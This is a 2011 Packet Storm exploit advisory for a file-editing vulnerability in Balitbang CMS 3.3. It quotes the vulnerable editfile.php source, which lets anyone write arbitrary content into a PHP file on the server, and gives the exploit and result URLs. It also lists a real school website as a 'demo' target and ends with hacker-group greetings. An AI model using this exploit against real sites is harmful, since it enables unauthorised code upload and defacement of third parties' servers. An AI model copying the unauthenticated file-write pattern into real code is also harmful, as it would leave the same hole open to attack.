Balitbang CMS 3.3 File Edit

2011-03-19T00:00:00
ID PACKETSTORM:99500
Type packetstorm
Reporter Xr0b0t
Modified 2011-03-19T00:00:00

Description

                                        
                                            `[!]===========================================================================[!]  
  
[~] CMS Balitbang Edit File Vulnerability   
[~] Author : Xr0b0t (xrt.interpol@gmx.us)  
[~] Homepage : www.indonesiancoder.com | xrobot.mobi | mc-crew.net | exploit-id.com  
[~] Date : 18 Mart, 2010  
[~] Tested on : BlackBuntu RC2  
  
[!]===========================================================================[!]  
  
[ Software Information ]  
  
[+] Vendor : kajianwebsite.org  
[+] Download : http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip  
[+] Price : free  
[+] Vulnerability : Local File Editing  
[+] Dork : Xr0b0t Was Here ;)  
[+] Version : version 3.3  
  
[!]===========================================================================[!]  
  
[ Default Site ]  
http://127.0.0.1/  
  
  
  
[ XpL ]  
  
http://127.0.0.1/litbang//functions/editfile.php  
  
[code]  
<?php  
if ($save=='simpan') {  
$dwrite = fopen("../modul/tag_".$file.".php", "w");  
$nfile = stripslashes($nfile);  
fputs ($dwrite, $nfile);  
fclose ($dwrite);  
echo "File sudah disimpan....Silahkan tutup jendela ini";  
//header("Location: ../admin/admin.php?mode=konf&kd=berhasil");  
}  
else {  
$dread = file("../modul/tag_".$file.".php");  
for ($i=0; $i <= count($dread); $i++) {  
$output .= $dread[$i];  
}  
echo "<form action='editfile.php' method=post>File Name : <input type=text name=nmfile value='tag_".$file.".php'> Jarngan diganti<br><textarea name=nfile cols=80 rows=20>$output</textarea><br><input type=hidden name=file value='$file' >  
<input type=submit value='Simpan' ><input type=hidden name='save' value='simpan' ></form>";  
  
}  
?>  
  
  
  
  
[ Result In ]  
  
http://127.0.0.1/litbang//modul/tag_.php  
  
[ Demo ]  
  
exploit : http://www.smkn3-magelang.com//functions/editfile.php  
  
Result : http://www.smkn3-magelang.com/modul/tag_.php  
  
  
  
  
etc etc etc ;]  
  
[!]===========================================================================[!]  
  
[ Thx TO ]  
  
[+] Don Tukulesto DUDUl Kok G rene2... Kal0ng 666 Cepet Jadikan Ntu PRoyek  
[+] INDONESIAN CODER TEAM IndonesianHacker Malang CYber CREW Magelang Cyber  
[+] tukulesto,M3NW5,arianom,N4CK0,abah_benu,d0ntcry,bobyhikaru,gonzhack,senot  
[+] Contrex,YadoY666,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBL13Z,r3m1ck  
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue,otong,CS-31,Yur4kha,Geni212  
  
  
[ NOTE ]  
  
[+] OJOK JOTOS2an YO ..  
[+] Minggir semua Arumbia Team Mau LEwat ;)  
[+] MBEM : lup u :">  
  
[ QUOTE ]  
  
[+] INDONESIANCODER still r0x...  
[+] ARUmBIA TEam Was Here Cuy MINGIR Kabeh KAte lewat ..  
[+] Malang Cyber Crew & Magelang Cyber Community  
`